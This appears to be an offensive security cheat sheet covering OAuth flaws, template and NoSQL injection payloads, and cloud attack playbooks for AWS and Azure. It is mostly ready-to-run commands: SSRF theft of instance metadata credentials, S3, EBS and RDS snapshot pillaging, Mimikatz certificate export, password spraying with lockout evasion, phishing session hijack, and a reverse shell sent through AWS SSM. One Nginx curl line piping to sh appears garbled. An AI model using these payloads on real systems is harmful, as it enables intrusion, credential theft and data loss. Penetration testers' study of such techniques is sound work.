- resource owner: The resource owner is the user/entity granting access to their protected resource, such as their Twitter account Tweets
- resource server: The resource server is the server handling authenticated requests after the application has obtained an access token on behalf of the resource owner . In the above example, this would be https://twitter.com
- client application: The client application is the application requesting authorization from the resource owner. In this example, this would be https://yourtweetreader.com.
authorization server: The authorization server is the server issuing access tokens to the client application after successfully authenticating the resource owner and obtaining authorization. In the above example, this would be https://twitter.com
- client_id: The client_id is the identifier for the application. This is a public, non-secret unique identifier.
- client_secret: The client_secret is a secret known only to the application and the authorization server. This is used to generate access_tokens
- response_type: The response_type is a value to detail which type of token is being requested, such as code
- scope: The scope is the requested level of access the client application is requesting from the resource owner
- redirect_uri: The redirect_uri  is the URL the user is redirected to after the authorization is  complete. This usually must match the redirect URL that you have  previously registered with the service
- state: The state  parameter can persist data between the user being directed to the  authorization server and back again. It’s important that this is a  unique value as it serves as a CSRF protection mechanism if it contains a  unique or random value per request
- grant_type: The grant_type parameter explains what the grant type is, and which token is going to be returned
- code: This code is the authorization code received from the authorization server which will be in the query string parameter “code” in this request. This code is used in conjunction with the client_id and client_secret by the client application to fetch an access_token
- access_token: The access_token is the token that the client application uses to make API requests on behalf of a resource owner
- refresh_token: The refresh_token allows an application to obtain a new access_token without prompting the user

Bugs

- Weak redirect_uri configuration
• Open redirects: https://yourtweetreader.com/callback?redirectUrl=https://evil.com
• Path traversal: https://yourtweetreader.com/callback/../redirect?url=https://evil.com
• Weak redirect_uri regexes: https://yourtweetreader.com.evil.com
• HTML Injection and stealing tokens via referer header: https://yourtweetreader.com/callback/home/attackerimg.jpg

- Improper handling of state parameter

• Slack integrations allowing an attacker to add their Slack account as the recipient of all notifications/messages
• Stripe integrations allowing an attacker to overwrite payment info and accept payments from the victim’s customers
• PayPal integrations allowing an attacker to add their PayPal account to the victim’s account, which would deposit money to the attacker’s PayPal

- Assignment of accounts based on email address

• If not email verification is needed in account creation, register before the victim.
• If not email verification in Oauth signing, register other app before the victim.

- Disclosure of secrets in url

- Access token passed in request body
   → If the access token is passed in the request body at the time of allocating the access token to the web application there arises an attack scenario. An attacker can create a web application and register for an Oauth framework with a provider such as twitter or facebook. The attacker uses it as a malicious app for gaining access tokens. For example, a Hacker can build his own facebook app and get victim’s facebook access token and use that access token to login into victim account.

- Reusability of an Oauth access token
   → Sometimes there are cases where an Ouath token previously used does not expire with an immediate effect post logout of the account. In such cases there is a possiblility to login with the previous Oauth token i.e; replace the new Oauth access token with the old one and continue to the application. This should not be the case and is considered as a very bad practice.

Multiple OAUTH resources

https://owasp.org/www-pdf-archive/20151215-Top_X_OAuth_2_Hacks-asanso.pdf
https://medium.com/@lokeshdlk77/stealing-facebook-mailchimp-application-oauth-2-0-access-token-3af51f89f5b0
https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1
https://gauravnarwani.com/misconfigured-oauth-to-account-takeover/
https://medium.com/@Jacksonkv22/oauth-misconfiguration-lead-to-complete-account-takeover-c8e4e89a96a
https://medium.com/@logicbomb_1/bugbounty-user-account-takeover-i-just-need-your-email-id-to-login-into-your-shopping-portal-7fd4fdd6dd56
https://medium.com/@protector47/full-account-takeover-via-referrer-header-oauth-token-steal-open-redirect-vulnerability-chaining-324a14a1567
https://hackerone.com/reports/49759
https://hackerone.com/reports/131202
https://hackerone.com/reports/6017
https://hackerone.com/reports/7900
https://hackerone.com/reports/244958
https://hackerone.com/reports/405100
https://ysamm.com/?p=379
https://www.amolbaikar.com/facebook-oauth-framework-vulnerability/
https://medium.com/@godofdarkness.msf/mail-ru-ext-b-scope-account-takeover-1500-abdb1560e5f9
https://medium.com/@tristanfarkas/finding-a-security-bug-in-discord-and-what-it-taught-me-516cda561295
https://medium.com/@0xgaurang/case-study-oauth-misconfiguration-leads-to-account-takeover-d3621fe8308b
https://medium.com/@rootxharsh_90844/abusing-feature-to-steal-your-tokens-f15f78cebf74
http://blog.intothesymmetry.com/2014/02/oauth-2-attacks-and-bug-bounties.html
http://blog.intothesymmetry.com/2015/04/open-redirect-in-rfc6749-aka-oauth-20.html
https://www.veracode.com/blog/research/spring-social-core-vulnerability-disclosure
https://medium.com/@apkash8/oauth-and-security-7fddce2e1dc5

Flask

**Tools**
https://github.com/Paradoxis/Flask-Unsign

pip3 install flask-unsign
flask-unsign
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
flask-unsign --decode --server 'https://www.example.com/login'
flask-unsign --unsign --cookie < cookie.txt
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

Python Flask SSTI Payloads and tricks

* {{url_for.globals}}
* {{request.environ}}
* {{config}}
* {{url_for.__globals__.__builtins__.open('/etc/passwd').read()}}
* {{self}}
* request|attr('class') == request.class == request[\x5f\x5fclass\x5f\x5f]                                                                                                       

Symfony/Twig

• Twig:

https://medium.com/server-side-template-injection/server-side-template-injection-faf88d0c7f34

• Check for www.example.com/_profiler/ it contains errors and server variables

**Tools**
# Server-Side Template Injection and Code Injection Detection and Exploitation Tool 
https://github.com/epinna/tplmap
./tplmap.py -u 'http://www.target.com/page?name=John'

Drupal

**Tools** 
# https://github.com/ajinabraham/CMSScan
docker run -it -p 7070:7070 cmsscan
python3 cmsmap.py https://www.example.com -F

# https://github.com/Tuhinshubhra/CMSeeK
python3 cmseek.py -u domain.com

NoSql/MongoDB

**Tools** 
https://github.com/codingo/NoSQLMap
python setup.py install

# Payload: 
' || 'a'=='a

mongodbserver:port/status?text=1

# in URL
username[$ne]=toto&password[$ne]=toto

##in JSON
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$gt":""}, "password": {"$gt":""}}

PHP

**Tools** 
https://github.com/TarlogicSecurity/Chankro

# Bypass disable_functions and open_basedir
python2 chankro.py --arch 64 --input rev.sh --output chan.php --path /var/www/html

RoR (Ruby on Rails)

**Tools** 
# https://github.com/presidentbeef/brakeman
gem install brakeman
brakeman /path/to/rails/application

JBoss - Java Deserialization

# JexBoss
# https://github.com/joaomatosf/jexboss
python jexboss.py -host http://target_host:8080

OneLogin - SAML Login

# https://developers.onelogin.com/saml
# https://github.com/fadyosman/SAMLExtractor
./samle.py -u https://carbon-prototype.uberinternal.com/
./samle.py -r "https://domain.onelogin.com/trust/saml2/http-post/sso/571434?SAMLRequest=nVNNb9swDP0rhu7%2BkO0iqRAH8FIMC9BtRuLtOjAS2wqwJU%2Bi1%2FTfT3aSIoc1h10siXzie3yiVx76bhD1SC9mh79H9BQd%2B854MScqNjojLHjthYEevSAp9vXXR5EnmRicJSttx6LmvPukjdLm%2Bfa1wwnkxZe2beLm%2B75l0U90XltTsQBg0db7EbfGExgKoYwvY85jXrZZJgouijxAHiqGPC8XRblEDF9eZvcqX4DEXC3v70CpgkW19%2BgoFN5Y48ce3R7dHy3xx%2B6xYi9EgxdpKsEdrInnbuhtwGQ8oNOG0BnoEml7UZZFarWC4FI6%2BfJLnsqx9Wo6ilmvuzLutgFwUcXWFw0wDIk12NlnbSbKmSbtkUABQXq34GVRrtIrthP1IL6F8tuHxnZavkV119nXjUMgrBi5EVn02boe6GNBPOFzRKv4aYYK7EF3tVIOvWfphec8HajmWQl%2BEh4p2th%2BAKf99HR4BEkXS65Rmy50vMOn%2FzHoJkwKOZUO4SYsr9apaRBRBpWtA%2BMH6%2Bhs2r%2F0rE%2B5D3p7z17%2FHOu%2F&RelayState=%2F"

Adobe Flash SWF

# SWF Param Finder
https://github.com/m4ll0k/SWFPFinder
bash swfpfinder.sh https://example.com/test.swf

Adobe AEM

# AEM hacker
https://github.com/0ang3el/aem-hacker
python3 aem_discoverer.py --file urls.txt --workers 150
python3 aem_hacker.py --url https://example.com --host burp-collaborator

# AEM scan
https://github.com/Raz0r/aemscan
aemscan http://example.com

Nginx

curl -gsS https://example.com:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00example.com/../../../%00/n …\<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Cloud

• AWS
• Azure
• OSINT Cloud
• Docker/Kubernetes
• CDN

General

**Tools**
# Non provider specific and general purpose
# https://github.com/nccgroup/ScoutSuite
# https://github.com/initstring/cloud_enum
python3 cloud_enum.py -k companynameorkeyword

# Dictionary
https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb

Searching for bad configurations

No auditable items:
• DoS testing
• Intense fuzzing
• Phishing the cloud provider’s employees
• Testing other company’s assets
• Etc.

Audit policies:

# Azure
https://www.microsoft.com/en-us/msrc/pentest-rules-of-engagement
# Aws
https://aws.amazon.com/security/penetration-testing/
# GCP
https://support.google.com/cloud/answer/6262505?hl=en

# Quicks
.cspkg file its a gold mine, its a zip file with all the compiled code and config files.

Recon

• First step should be to determine what services are in use
• More and more orgs are moving assets to the cloud one at a time
• Many have limited deployment to cloud providers, but some have fully embraced the cloud and are using it for AD, production assets, security products, and more
• Determine things like AD connectivity, mail gateways, web apps, file storage, etc.
• Traditional host discovery still applies
• After host discovery resolve all names, then perform whois
lookups to determine where they are hosted
• Microsoft, Amazon, Google IP space usually indicates cloud service usage
   ◇ More later on getting netblock information for each cloud service
• MX records can show cloud-hosted mail providers
• Certificate Transparency (crt.sh)
• Monitors and logs digital certs
• Creates a public, searchable log
• Can help discover additional subdomains
• More importantly… you can potentially find more Top Level Domains (TLD’s)!
• Single cert can be scoped for multiple domains
• Search (Google, Bing, Baidu, DuckDuckGo): site:targetdomain.com -site:www.targetdomain.com
• Shodan.io and Censys.io zoomeye.org
• Internet-wide portscans
• Certificate searches
• Shodan query examples:
   ◇ org:”Target Name”
   ◇ net:”CIDR Range”
   ◇ port:”443”
• DNS Brute Forcing
• Performs lookups on a list of potential subdomains
• Make sure to use quality lists
• SecLists: https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS
• MX Records can help us identify cloud services in use
   ◇ O365 = target-domain.mail.protection.outlook.com
   ◇ G-Suite = google.com | googlemail.com
   ◇ Proofpoint = pphosted.com
• If you find commonalities between subdomains try iterating names
•  Other Services
   ◇ HackerTarget https://hackertarget.com/
   ◇ ThreatCrowd  https://www.threatcrowd.org/
   ◇ DNSDumpster  https://dnsdumpster.com/
   ◇ ARIN Searches  https://whois.arin.net/ui/
      ▪ Search bar accepts wild cards “*”
      ▪ Great for finding other netblocks owned by the same organization
• Azure Netblocks
      ▪ Public: https://www.microsoft.com/en-us/download/details.aspx?id=56519
      ▪ US Gov: http://www.microsoft.com/en-us/download/details.aspx?id=57063
      ▪ Germany: http://www.microsoft.com/en-us/download/details.aspx?id=57064
      ▪ China: http://www.microsoft.com/en-us/download/details.aspx?id=57062
• AWS Netblocks
   ◇ https://ip-ranges.amazonaws.com/ip-ranges.json
• GCP Netblocks
   ◇ Google made it complicated so there’s a script on the next page to get the current IP netblocks.
• Box.com Usage
   ◇ Look for any login portals
      ▪ https://companyname.account.box.com
   ◇ Can find cached Box account data too 
• Employees
   ◇ LinkedIn
   ◇ PowerMeta https://github.com/dafthack/PowerMeta
   ◇ FOCA https://github.com/ElevenPaths/FOCA
   ◇ hunter.io

 Tools:
    • Recon-NG https://github.com/lanmaster53/recon-ng
    • OWASP Amass https://github.com/OWASP/Amass
    • Spiderfoot https://www.spiderfoot.net/
    • Gobuster https://github.com/OJ/gobuster
    • Sublist3r https://github.com/aboul3la/Sublist3r

Foothold:
• Find ssh keys in shhgit.darkport.co.uk https://github.com/eth0izzle/shhgit
• GitLeaks https://github.com/zricethezav/gitleaks
• Gitrob https://github.com/michenriksen/gitrob
• Truffle Hog https://github.com/dxa4481/truffleHog

Password attacks:
• Password Spraying
   ◇ Trying one password for every user at an org to avoid account lockouts (Spring2020)
• Most systems have some sort of lockout policy
   ◇ Example: 5 attempts in 30 mins = lockout
• If we attempt to auth as each individual username one time every 30 mins we lockout nobody
• Credential Stuffing
   ◇ Using previously breached credentials to attempt to exploit password reuse on corporate accounts
• People tend to reuse passwords for multiple sites including corporate accounts
• Various breaches end up publicly posted
• Search these and try out creds
• Try iterating creds

Web server explotation
• Out-of-date web technologies with known vulns
• SQL or command injection vulns
• Server-Side Request Forgery (SSRF)
• Good place to start post-shell:
• Creds in the Metadata Service
• Certificates
• Environment variables
• Storage accounts
• Reused access certs as private keys on web servers
   ◇ Compromise web server
   ◇ Extract certificate with Mimikatz
   ◇ Use it to authenticate to Azure
• Mimikatz can export “non-exportable” certificates:
    mimikatz# crypto::capi
    mimikatz# privilege::debug
    mimikatz# crypto::cng
    mimikatz# crypto::certificates /systemstore:local_machine /store:my /export

Phising
• Phishing is still the #1 method of compromise
• Target Cloud engineers, Developers, DevOps, etc.
• Two primary phishing techniques:
   ◇ Cred harvesting / session hijacking
   ◇ Remote workstation compromise w/ C2
• Attack designed to steal creds and/or session cookies
• Can be useful when security protections prevent getting shells
• Email a link to a target employee pointing to cloned auth portal
   ◇ Examples: Microsoft Online (O365, Azure, etc.), G-Suite, AWS Console
• They auth and get real session cookies… we get them too.

Phishing: Remote Access
• Phish to compromise a user’s workstation
• Enables many other options for gaining access to cloud resources
• Steal access tokens from disk
• Session hijack
• Keylog
• Web Config and App Config files
   ◇ Commonly found on pentests to include cleartext creds
   ◇ WebApps often need read/write access to cloud storage or DBs
   ◇ Web.config and app.config files might contain creds or access tokens
   ◇ Look for management cert and extract to pfx like publishsettings files
   ◇ Often found in root folder of webapp
• Internal Code Repositories
   ◇ Gold mine for keys
   ◇ Find internal repos:
      ▪ A. Portscan internal web services (80, 443, etc.) then use EyeWitness to screenshot each service to quickly analyze
      ▪ B. Query AD for all hostnames, look for subdomains git, code, repo, bitbucket, gitlab, etc..
   ◇ Can use automated tools (gitleaks, trufflehog, gitrob) or use built-in search features
      ▪ Search for AccessKey, AKIA, id_rsa, credentials, secret, password, and token
• Command history
• The commands ran previously may indicate where to look
• Sometimes creds get passed to the command line
• Linux hosts command history is here:
   ◇ ~/.bash_history
• PowerShell command history is here:
   ◇ %USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Post-Compromise Recon
• Who do we have access as?
• What roles do we have?
• Is MFA enabled?
• What can we access (webapps, storage, etc.?)
• Who are the admins?
• How are we going to escalate to admin?
• Any security protections in place (ATP, GuardDuty, etc.)?

AWS

**Tools**
# Find buckets 
# https://github.com/0xbharath/slurp
./slurp keyword -p permutations.json -t netflix -c 25
./slurp domain -t amazon.com 
./slurp internal
# https://github.com/initstring/cloud_enum
python3 cloud_enum.py -k companynameorkeyword
# https://github.com/nahamsec/lazys3
ruby lazys3.rb companyname
# https://github.com/jordanpotti/AWSBucketDump
source /home/cloudhacker/tools/AWSBucketDump/bin/activate
touch s.txt
sed -i "s,$,-$bapname-awscloudsec,g" /home/cloudhacker/tools/AWSBucketDump/BucketNames.txt
python AWSBucketDump.py -D -l BucketNames.txt -g s.txt
# https://github.com/gwen001/s3-buckets-finder
php s3-buckets-bruteforcer.php --bucket gwen001-test002

# Unauth checkers
# https://github.com/sa7mon/S3Scanner
sudo python3 s3scanner.py sites.txt
sudo python ./s3scanner.py --include-closed --out-file found.txt --dump names.txt
# https://github.com/jordanpotti/AWSBucketDump
python3 AWSBucketDump.py -l hosts.txt
# https://github.com/Ucnt/aws-s3-data-finder/
python3 find_data.py -n bucketname -u

# Auth required
# Pacu https://github.com/RhinoSecurityLabs/pacu
# AwsPwn https://github.com/dagrz/aws_pwn
# WeirdAAL https://github.com/carnal0wnage/weirdAAL
# Dufflebag https://github.com/bishopfox/dufflebag
# https://github.com/andresriancho/enumerate-iam
python enumerate-iam.py --access-key XXXXXXXXXXXXX --secret-key XXXXXXXXXXX
# https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py
python aws_escalate.py
# https://github.com/RhinoSecurityLabs/pacu

Auth methods:
• Programmatic access - Access + Secret Key
   ◇ Secret Access Key and Access Key ID for authenticating via scripts and CLI
• Management Console Access
   ◇ Web Portal Access to AWS

Aws S3 permissions:
https://labs.detectify.com/2017/07/13/a-deep-dive-into-aws-s3-access-controls-taking-full-control-over-your-assets/

Recon:
• AWS Usage
   ◇ Some web applications may pull content directly from S3 buckets
   ◇ Look to see where web resources are being loaded from to determine if S3 buckets are being utilized
   ◇ Burp Suite
   ◇ Navigate application like you normally would and then check for any requests to:
      ▪ https://[bucketname].s3.amazonaws.com
      ▪ https://s3-[region].amazonaws.com/[OrgName]

S3:
• Amazon Simple Storage Service (S3)
   ◇ Storage service that is “secure by default”
   ◇ Configuration issues tend to unsecure buckets by making them publicly accessible
   ◇ Nslookup can help reveal region
   ◇ S3 URL Format:
      ▪ https://[bucketname].s3.amazonaws.com
      ▪ https://s3-[region].amazonaws.com/[Org Name]
        # aws s3 ls s3://bucket-name-here --region 
        # aws s3api get-bucket-acl --bucket bucket-name-here
        # aws s3 cp readme.txt  s3://bucket-name-here --profile newuserprofile

EBS Volumes:
• Elastic Block Store (EBS)
• AWS virtual hard disks
• Can have similar issues to S3 being publicly available
• Dufflebag from Bishop Fox https://github.com/bishopfox/dufflebag
• Difficult to target specific org but can find widespread leaks

EC2:
• Like virtual machines
• SSH keys created when started, RDP for Windows.
• Security groups to handle open ports and allowed IPs.

PACU - An AWS exploitation framework from Rhino Security Labs
# https://github.com/RhinoSecurityLabs/pacu
• Modules examples:
   • S3 bucket discovery
   • EC2 enumeration
   • IAM privilege escalation
   • Persistence modules
   • Exploitation modules
   • And more…

AWS Instance Metadata URL
• Cloud servers hosted on services like EC2 needed a way to orient themselves because of how dynamic they are
• A “Metadata” endpoint was created and hosted on a non-routable IP address at 169.254.169.254
• Can contain access/secret keys to AWS and IAM credentials
• This should only be reachable from the localhost
• Server compromise or SSRF vulnerabilities might allow remote attackers to reach it
• IAM credentials can be stored here:
   ◇ http://169.254.169.254/latest/meta-data/iam/security-credentials/
• Can potentially hit it externally if a proxy service (like Nginx) is being hosted in AWS.
   ◇ curl --proxy vulndomain.target.com:80 http://169.254.169.254/latest/meta-data/iam/security-credentials/ && echo
• CapitalOne Hack
   ◇ Attacker exploited SSRF on EC2 server and accessed metadata URL to get IAM access keys. Then, used keys to dump S3 bucket containing 100 million individual’s data.
• AWS EC2 Instance Metadata service Version 2 (IMDSv2)
• Updated in November 2019 – Both v1 and v2 are available
• Supposed to defend the metadata service against SSRF and reverse proxy vulns
• Added session auth to requests
• First, a “PUT” request is sent and then responded to with a token
• Then, that token can be used to query data
--
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
curl http://example.com/?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role
--

# If we can steal AWS credentials, add to your configuration
aws configure --profile stolen
# Open ~/.aws/credentials
# Under the [stolen] section add aws_session_token and add the discovered token value here
aws sts get-caller-identity --profile stolen


Post-compromise
• What do our access keys give us access to?
• WeirdAAL – Great tool for enumerating AWS access https://github.com/carnal0wnage/weirdAAL
   ◇ Run the recon_all module to learn a great deal about your access

https://github.com/toniblyx/my-arsenal-of-aws-security-tools
https://docs.aws.amazon.com/es_es/general/latest/gr/aws-security-audit-guide.html

export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_DEFAULT_REGION=

aws sts get-caller-identity
aws s3 ls
aws s3 ls s3://bucket.com
aws s3 ls --recursive s3://bucket.com
aws iam get-account-password-policy
aws sts get-session-token

# AWS nuke - remove all AWS services of our account
# https://github.com/rebuy-de/aws-nuke
- Fill nuke-config.yml with the output of aws sts get-caller-identity
./aws-nuke -c nuke-config.yml # Checks what will be removed
- If fails because there is no alias created
aws iam create-account-alias --account-alias unique-name
./aws-nuke -c nuke-config.yml --no-dry-run # Will perform delete operation
# Cloud Nuke
# https://github.com/gruntwork-io/cloud-nuke
cloud-nuke aws

EC2 example attacks

# Like traditional host
- Port enumeration
- Attack interesting services like ssh or rdp

# SSRF to http://169.254.169.254 (Metadata server)
curl http://<ec2-ip-address>/\?url\=http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/public-hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/network/interfaces/
http://169.254.169.254/latest/meta-data/local-ipv4
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key/
http://169.254.169.254/latest/user-data

# Find IAM Security Credentials
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Using EC2 instance metadata tool
ec2-metadata -h
# With EC2 Instance Meta Data Service version 2 (IMDSv2):
Append X-aws-ec2-metadata-token Header generated with a PUT request to http://169.254.169.254/latest/api/token

# Check directly for metadata instance
curl -s http://<ec2-ip-address>/latest/meta-data/ -H 'Host:169.254.169.254'

AWS Lambda

# Welcome to serverless!!!!
# AWS Lambda, essentially are short lived servers that run your function and provide you with output that can be then used in other applications or consumed by other endpoints.

# OS command Injection in Lambda
curl "https://API-endpoint/api/stringhere"
# For a md5 converter endpoint "https://API-endpoint/api/hello;id;w;cat%20%2fetc%2fpasswd"
aws lambda list-functions --profile stolen
aws lambda get-function --function-name <FUNCTION-NAME> --profile stolen

AWS Inspector

# Amazon Inspector is an automated security assessment service that helps improve the security and compliance of applications deployed on AWS.

S3 examples attacks

# S3 Bucket Pillaging

• GOAL: Locate Amazon S3 buckets and search them for interesting data
• In this lab you will attempt to identify a publicly accessible S3 bucket hosted by an organization. After identifying it you will list out the contents of it and download the files hosted there.

~$ sudo apt-get install python3-pip
~$ git clone https://github.com/RhinoSecurityLabs/pacu
~$ cd pacu
~$ sudo bash install.sh
~$ sudo aws configure
~$ sudo python3 pacu.py

Pacu > import_keys --all
# Search by domain
Pacu > run s3__bucket_finder -d glitchcloud 
# List files in bucket
Pacu > aws s3 ls s3://glitchcloud
# Download files
Pacu > aws s3 sync s3://glitchcloud s3-files-dir

# S3 Code Injection
• Backdoor JavaScript in S3 Buckets used by webapps 
• In March, 2018 a crypto-miner malware was found to be loading on MSN’s homepage
• This was due to AOL’s advertising platform having a writeable S3 bucket, which was being served by MSN
• If a webapp is loading content from an S3 bucket made publicly writeable attackers can upload  malicious JS to get executed by visitors 
• Can perform XSS-type attacks against webapp visitors
• Hook browser with Beef

# Domain Hijacking
• Hijack S3 domain by finding references in a webapp to S3 buckets that don’t exist anymore
• Or… subdomains that were linked to an S3 bucket with CNAME’s that still exist
• When assessing webapps look for 404’s to *.s3.amazonaws.com
• When brute forcing subdomains for an org look for 404’s with ‘NoSuchBucket’ error 
• Go create the S3 bucket with the same name and region 
• Load malicious content to the new S3 bucket that will be executed when visitors hit the site

EBS attack example

# Discover EBS Snapshot and mount it to navigate
- Obtaning public snapshot name
aws ec2 describe-snapshots --region us-east-1 --restorable-by-user-ids all | grep -C 10 "company secrets"
- Obtaining zone and instance
aws ec2 describe-instances --filters Name=tag:Name,Values=attacker-machine
- Create a new volume of it
aws ec2 create-volume --snapshot-id snap-03616657ede4b9862 --availability-zone <ZONE-HERE>
- Attach to an EC2 instance
aws ec2 attach-volume --device /dev/sdh --instance-id <INSTANCE-ID> --volume-id <VOLUME-ID>
    - It takes some time, to see the status:
    aws ec2 describe-volumes --filters Name=volume-id,Values=<VOLUME-ID>
- Once is mounted in EC2 instance, check it, mount it and access it:
sudo lsblk
sudo mount /dev/xvdh1 /mnt
cd /mnt/home/user/companydata

AWS RDS (DB) attacks

# Just like a MySQL, try for sqli!
# Check if 3306 is exposed
# Sqlmap is your friend ;)

# Stealing RDS Snapshots
- Searching partial snapshots
aws rds describe-db-snapshots --include-public --snapshot-type public --db-snapshot-identifier arn:aws:rds:us-east-1:159236164734:snapshot:globalbutterdbbackup
- Restore in instance
aws rds restore-db-instance-from-db-snapshot --db-instance-identifier recoverdb --publicly-accessible --db-snapshot-identifier arn:aws:rds:us-east-1:159236164734:snapshot:globalbutterdbbackup --availability-zone us-east-1b
- Once restored, try to access
aws rds describe-db-instances --db-instance-identifier recoverdb
- Reset the master credentials
aws rds modify-db-instance --db-instance-identifier recoverdb --master-user-password NewPassword1 --apply-immediately
    - Takes some time, you can check the status:
    aws rds describe-db-instances
- Try to access it from EC2 instance which was restored
nc rds-endpoint 3306 -zvv    
- If you can't see, you may open 3306:
    - In RDS console, click on the recoverdb instance
    - Click on the Security Group
    - Add an Inbound rule for port 3306 TCP for Cloudhacker IP
 - Then connect it
 mysql -u <username> -p -h <rds-instance-endpoint>

AWS Systems Manager

# AWS SSM
- The agent must be installed in the machines
- It's used to create roles and policies

# Executing commands
aws ssm describe-instance-information #Get instance
- Get "ifconfig" commandId
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP config" --parameters commands=ifconfig --output text --query "Command.CommandId"
- Execute CommandID generated for ifconfig
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}"

# Getting shell
- You already need to have reverse.sh uploaded to s3
#!/bin/bash
bash -i >& /dev/tcp/REVERSE-SHELL-CATCHER/9999 0>&1
- Start your listener
aws ssm send-command --document-name "AWS-RunRemoteScript" --instance-ids "INSTANCE-ID-HERE" --parameters '{"sourceType":["S3"],"sourceInfo":["{\"path\":\"PATH-TO-S3-SHELL-SCRIPT\"}"],"commandLine":["/bin/bash NAME-OF-SHELL-SCRIPT"]}' --query "Command.CommandId"

Aws Services Summary

Azure

**Tools** 
# ROADtools https://github.com/dirkjanm/ROADtools
    ◇ Dumps all Azure AD info from the Microsoft Graph API 
    ◇ Has a GUI for interacting with the data 
    ◇ Plugin for BloodHound with connections to on-prem AD accounts if DirSync is enabled 
• PowerMeta https://github.com/dafthack/PowerMeta
• MicroBurst https://github.com/NetSPI/MicroBurst
• ScoutSuite https://github.com/nccgroup/ScoutSuite
• PowerZure https://github.com/hausec/PowerZure
• https://github.com/fox-it/adconnectdump
# Azurite https://github.com/FSecureLABS/Azurite
• https://github.com/mburrough/pentestingazureapps

Auth methods:
• Password Hash Synchronization
   ◇ Azure AD Connect
   ◇ On-prem service synchronizes hashed user credentials to Azure
   ◇ User can authenticate directly to Azure services like O365 with their internal domain credential
• Pass Through Authentication
   ◇  Credentials stored only on-prem
   ◇ On-prem agent validates authentication requests to Azure AD
   ◇ Allows SSO to other Azure apps without creds stored in cloud
• Active Directory Federation Services (ADFS)
   ◇ Credentials stored only on-prem
   ◇ Federated trust is setup between Azure and on-prem AD to validate auth requests to the cloud
   ◇ For password attacks you would have to auth to the on-prem ADFS portal instead of Azure endpoints
• Certificate-based auth
   ◇ Client certs for authentication to API
   ◇ Certificate management in legacy Azure Service Management (ASM) makes it impossible to know who created a cert (persistence potential)
   ◇ Service Principals can be setup with certs to auth
• Conditional access policies
• Long-term access tokens
   ◇ Authentication to Azure with oAuth tokens
   ◇ Desktop CLI tools that can be used to auth store access tokens on disk
   ◇ These tokens can be reused on other MS endpoints
   ◇ We have a lab on this later!
• Legacy authentication portals

Recon:
• O365 Usage
   ◇ https://login.microsoftonline.com/getuserrealm.srf?login=username@acmecomputercompany.com&xml=1
   ◇ https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/test@targetdomain.com?Protocol=Autodiscoverv1
• User enumeration on Azure can be performed at
    https://login.Microsoft.com/common/oauth2/token
      ▪ This endpoint tells you if a user exists or not
   ◇ Detect invalid users while password spraying with:
      ▪ https://github.com/dafthack/MSOLSpray
   ◇ For on-prem OWA/EWS you can enumerate users with timing attacks (MailSniper)

Microsoft Azure Storage:
• Microsoft Azure Storage is like Amazon S3
• Blob storage is for unstructured data
• Containers and blobs can be publicly accessible via access policies
• Predictable URL’s at core.windows.net
   ◇ storage-account-name.blob.core.windows.net
   ◇ storage-account-name.file.core.windows.net
   ◇ storage-account-name.table.core.windows.net
   ◇ storage-account-name.queue.core.windows.net
• The “Blob” access policy means anyone can anonymously read blobs, but can’t list the blobs in the container
• The “Container” access policy allows for listing containers and blobs
• Microburst https://github.com/NetSPI/MicroBurst
   ◇ Invoke-EnumerateAzureBlobs
   ◇ Brute forces storage account names, containers, and files
   ◇ Uses permutations to discover storage accounts
        PS > Invoke-EnumerateAzureBlobs –Base 

Password Attacks
• Password Spraying Microsoft Online (Azure/O365)
• Can spray https://login.microsoftonline.com
--
POST /common/oauth2/token HTTP/1.1
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Host: login.microsoftonline.com
Content-Length: 195
Expect: 100-continue
Connection: close

resource=https%3A%2F%2Fgraph.windows.net&client_id=1b730954-1685-4b74-9bfd-
dac224a7b894&client_info=1&grant_type=password&username=user%40targetdomain.com&passwor
d=Winter2020&scope=openid
--
• MSOLSpray https://github.com/dafthack/MSOLSpray
   ◇ The script logs:
      ▪ If a user cred is valid
      ▪ If MFA is enabled on the account
      ▪ If a tenant doesn't exist
      ▪ If a user doesn't exist
      ▪ If the account is locked
      ▪ If the account is disabled
      ▪ If the password is expired
   ◇ https://docs.microsoft.com/en-us/azure/active-directory/develop/reference-aadsts-error-codes

Password protections & Smart Lockout
• Azure Password Protection – Prevents users from picking passwords with certain words like seasons, company name, etc.
• Azure Smart Lockout – Locks out auth attempts whenever brute force or spray attempts are detected.
   ◇ Can be bypassed with FireProx + MSOLSpray
   ◇ https://github.com/ustayready/fireprox

Phising session hijack
• Evilginx2 and Modlishka
   ◇ MitM frameworks for harvesting creds/sessions
   ◇ Can also evade 2FA by riding user sessions
• With a hijacked session we need to move fast
• Session timeouts can limit access
• Persistence is necessary

